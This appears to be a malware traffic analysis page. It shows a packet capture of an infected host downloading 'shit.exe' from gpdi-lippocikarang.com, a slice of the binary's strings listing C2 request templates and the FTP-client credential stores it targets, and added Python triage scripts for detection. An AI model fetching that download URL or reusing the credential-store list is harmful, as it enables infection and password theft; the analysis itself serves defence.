gpdi-lippocikarang.com shit.exe Malware Traffic Analysis Sample PCAP file download

2016-09-15 09:28:09.114046 IP 192.168.56.13.63558 > 8.8.8.8.53: 27577+ A? gpdi-lippocikarang.com. (40)
E..D……1…8……F.5.0..k…………gpdi-lippocikarang.com…..
2016-09-15 09:28:09.137827 IP 8.8.8.8.53 > 192.168.56.13.63558: 27577 1/0/0 A 111.68.116.106 (56)
E..T….1………8..5.F.@..k…………gpdi-lippocikarang.com……………..oDtj
2016-09-15 09:28:09.165003 IP 192.168.56.13.49228 > 111.68.116.106.80: Flags [S], seq 1038097904, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…….8.oDtj.L.P=……… .V?…………..
2016-09-15 09:28:09.485914 IP 111.68.116.106.80 > 192.168.56.13.49228: Flags [S.], seq 4072845162, ack 1038097905, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
EH.4..@.,.r.oDtj..8..P.L…j=…..9……………..
2016-09-15 09:28:09.486014 IP 192.168.56.13.49228 > 111.68.116.106.80: Flags [.], ack 1, win 256, length 0
E..(..@…….8.oDtj.L.P=……kP…….
2016-09-15 09:28:09.486511 IP 192.168.56.13.49228 > 111.68.116.106.80: Flags [P.], seq 1:189, ack 1, win 256, length 188: HTTP: GET /emaxx/shit.exe HTTP/1.0
E…..@…….8.oDtj.L.P=……kP….;..GET /emaxx/shit.exe HTTP/1.0
Host: gpdi-lippocikarang.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

2016-09-15 09:28:09.807923 IP 111.68.116.106.80 > 192.168.56.13.49228: Flags [.], ack 189, win 123, length 0
EH.(.4@.,…oDtj..8..P.L…k=…P..{……….
2016-09-15 09:28:09.807934 IP 111.68.116.106.80 > 192.168.56.13.49228: Flags [.], seq 1:1461, ack 189, win 123, length 1460: HTTP: HTTP/1.1 200 OK
EH…5@.,..:oDtj..8..P.L…k=…P..{….HTTP/1.1 200 OK
Date: Thu, 15 Sep 2016 13:28:09 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 12 Sep 2016 21:17:19 GMT
ETag: "24e069b-16a00-53c560574923d"
Accept-Ranges: bytes
Content-Length: 92672
Connection: close
Content-Type: application/x-msdownload

MZ………………….@………………………………………  .!..L.!This program cannot be run in DOS mode..
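The request/response pair above is the whole story of the download: a hard-coded HTTP/1.0 client claiming to be MSIE 5.0 on Windows 98 fetches /emaxx/shit.exe, and the server answers with application/x-msdownload and a body that starts with the MZ header. As an added example (not part of the capture or the sample), the following Python parses that exchange and reports the indicators a detection engineer would key on. The headers are copied from the capture; the body is a constructed MZ stub standing in for the 92,672-byte sample, so the hash it prints is the stub's, not the real file's.

```python
"""Added example: triage an HTTP request/response pair captured from a
malware download.  Headers are taken from the capture above; the body is a
constructed stand-in because the real bytes are not on the page."""
from __future__ import annotations

import hashlib
from dataclasses import dataclass

# --- constructed input: headers from the capture, body faked ----------------
REQUEST = (
    b"GET /emaxx/shit.exe HTTP/1.0\r\n"
    b"Host: gpdi-lippocikarang.com\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity, *;q=0\r\n"
    b"Connection: close\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    b"\r\n"
)
# Fake DOS stub: e_magic "MZ", padding, and the usual DOS-mode message.
FAKE_BODY = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n$"
RESPONSE = b"".join([
    b"HTTP/1.1 200 OK\r\n",
    b"Date: Thu, 15 Sep 2016 13:28:09 GMT\r\n",
    b"Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips\r\n",
    b"Accept-Ranges: bytes\r\n",
    b"Content-Length: %d\r\n" % len(FAKE_BODY),  # 92672 in the real capture
    b"Connection: close\r\n",
    b"Content-Type: application/x-msdownload\r\n",
    b"\r\n",
    FAKE_BODY,
])

# User-Agent the loader sends; the same string is baked into its request
# templates, so it also fingerprints the later C2 POSTs.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"


@dataclass
class HttpMessage:
    start_line: str
    headers: dict          # lower-cased header name -> value
    body: bytes


def parse_http(raw: bytes) -> HttpMessage:
    """Split a raw HTTP message into start line, headers and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete message: no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0], headers, body)


def triage(req: HttpMessage, resp: HttpMessage) -> list[str]:
    """Return the indicator names that fire on this exchange, in fixed order."""
    findings = []
    _method, path, version = req.start_line.split(" ", 2)
    # HTTP/1.0 plus a 1990s browser string is a hard-coded client, not a browser.
    if version == "HTTP/1.0" and req.headers.get("user-agent") == LEGACY_UA:
        findings.append("hardcoded_legacy_ua")
    # "identity, *;q=0" explicitly refuses compression; browsers do not do this.
    if req.headers.get("accept-encoding", "").startswith("identity"):
        findings.append("refuses_compression")
    if path.lower().endswith(".exe"):
        findings.append("exe_path")
    if resp.headers.get("content-type") == "application/x-msdownload":
        findings.append("msdownload_type")
    if resp.body[:2] == b"MZ":
        findings.append("mz_magic")
    # Declared length vs. bytes actually seen: catches a truncated capture.
    declared = int(resp.headers.get("content-length", "0"))
    if declared and declared != len(resp.body):
        findings.append("body_truncated")
    return findings


def carve(resp: HttpMessage) -> tuple[str, int]:
    """SHA-256 and size of the carved body (here: the constructed stub)."""
    return hashlib.sha256(resp.body).hexdigest(), len(resp.body)


if __name__ == "__main__":
    req, resp = parse_http(REQUEST), parse_http(RESPONSE)
    print("indicators:", triage(req, resp))
    print("carved sha256, size:", carve(resp))
```

Run against a real pcap you would reassemble the TCP stream first (tshark -z follow,tcp,raw or scapy) and feed the client and server halves to parse_http; the body_truncated check matters because, as in the capture above, a dump often shows only the first 1460-byte segment of the response.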


2016-09-15 09:31:19.346493 IP 111.68.116.106.80 > 192.168.56.13.49237: Flags [.], seq 77381:78841, ack 189, win 123, length 1460: HTTP
EH..e.@.,..poDtj..8..P.UW8k.U..rP..{.l..urrentVersion\Explorer\Shell Folders.explorer.exe.S-1-5-18…..SeImpersonatePrivilege.SeTcbPrivilege.SeChangeNotifyPrivilege.SeCreateTokenPrivilege.SeBackupPrivilege.SeRestorePrivilege.SeIncreaseQuotaPrivilege.SeAssignPrimaryTokenPrivilege..POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.Content-Length:.Location:.GET %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

……\*.*.*.*.HWID.{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}.GetNativeSystemInfo.kernel32.dll.IsWow64Process.Software\Far\Plugins\FTP\Hosts.Software\Far2\Plugins\FTP\Hosts.Software\Far Manager\Plugins\FTP\Hosts.Software\Far\SavedDialogHistory\FTPHost.Software\Far2\SavedDialogHistory\FTPHost.Software\Far Manager\SavedDialogHistory\FTPHost.Password.HostName.User.Line.wcx_ftp.ini.\GHISLER.InstallDir.FtpIniName.Software\Ghisler\Windows Commander.Software\Ghisler\Total Commander.\Ipswitch.Sites\.\Ipswitch\WS_FTP.\win.ini..ini.WS_FTP.DIR.DEFDIR.CUTEFTP.QCHistory.Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar.Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar.Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar.Software\GlobalSCAPE\Cute:
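The segment above is a slice of the binary's own string table as it crossed the wire: the privilege names it requests, the POST and GET templates it uses for check-in (same User-Agent as the download request), the HWID format string, and the registry keys and ini files where Far Manager, Total Commander, WS_FTP and CuteFTP keep FTP credentials. As an added example, not from the page or the sample, the Python below does the triage a practitioner would do on such a slice: extract printable strings from a blob, bucket them into indicator categories (the category names and regexes are my own labelling), and build the regex that matches an HWID rendered with that format string in C2 traffic. The blob is constructed from the strings visible above; how the sample derives the 16 bytes it feeds the HWID format is not on the page, so render_hwid treats them as caller input and assumes a little-endian GUID layout.

```python
"""Added example: strings-style extraction and indicator bucketing over a
constructed byte blob built from the strings visible in the capture."""
from __future__ import annotations

import re
import struct

# Constructed blob: fragments from the capture, NUL-separated as they would
# sit in the binary's read-only data, plus a few non-printable bytes.
BLOB = b"\x00".join([
    b"SeImpersonatePrivilege", b"SeTcbPrivilege", b"SeCreateTokenPrivilege",
    b"POST %s HTTP/1.0", b"Host: %s", b"Content-Encoding: binary",
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
    b"HWID", b"{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",
    b"Software\\Far Manager\\Plugins\\FTP\\Hosts",
    b"Software\\Ghisler\\Total Commander", b"wcx_ftp.ini",
    b"\\Ipswitch\\WS_FTP", b"Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar",
    b"IsWow64Process", b"GetNativeSystemInfo", b"\x01\x02\x03",
])

# Indicator buckets (my labelling, not the sample's).
INDICATORS = {
    "privilege_names":   re.compile(r"^Se\w+Privilege$"),
    "http_template":     re.compile(r"^(GET|POST) %s HTTP/1\.0$"),
    "legacy_ua":         re.compile(r"MSIE 5\.0; Windows 98"),
    "hwid_format":       re.compile(r"\{%08X-%04X-%04X-(?:%02X){2}-(?:%02X){6}\}"),
    "ftp_client_config": re.compile(r"(Plugins\\FTP|Ghisler|Ipswitch|WS_FTP|wcx_ftp\.ini|CuteFTP)", re.I),
    "arch_probe":        re.compile(r"^(IsWow64Process|GetNativeSystemInfo)$"),
}

# What the HWID format string produces on the wire: a GUID-style token.
HWID_VALUE = re.compile(r"\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}")


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable ASCII at least min_len long, like `strings -n`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def classify(strings: list[str]) -> dict[str, list[str]]:
    """Map each indicator bucket to the strings that hit it (empty buckets dropped)."""
    hits: dict[str, list[str]] = {name: [] for name in INDICATORS}
    for s in strings:
        for name, pat in INDICATORS.items():
            if pat.search(s):
                hits[name].append(s)
    return {name: found for name, found in hits.items() if found}


def render_hwid(raw16: bytes) -> str:
    """Render 16 bytes with the sample's HWID format string.

    Assumption: the first 8 bytes are a little-endian DWORD, WORD, WORD
    (GUID layout); the page does not say where the bytes come from."""
    if len(raw16) != 16:
        raise ValueError("HWID input must be 16 bytes")
    d1, d2, d3 = struct.unpack("<IHH", raw16[:8])
    return "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" % (d1, d2, d3, *raw16[8:])


def find_hwids(text: str) -> list[str]:
    """Pull HWID-shaped tokens out of a decoded C2 body or log line."""
    return HWID_VALUE.findall(text)


if __name__ == "__main__":
    found = extract_strings(BLOB)
    for bucket, items in classify(found).items():
        print(f"{bucket}: {items}")
    sample = render_hwid(bytes(range(16)))
    print("rendered HWID:", sample, "->", find_hwids("id=" + sample))
```

The categories map directly onto what the strings imply about the sample: privilege_names and arch_probe show it inspects its own token and the OS bitness, ftp_client_config shows which FTP clients it harvests credentials from, and http_template plus legacy_ua give the shape of its check-in request. The HWID_VALUE regex is the piece to carry into a log or body search, since the format string tells you exactly how the bot's identifier will look in a POST.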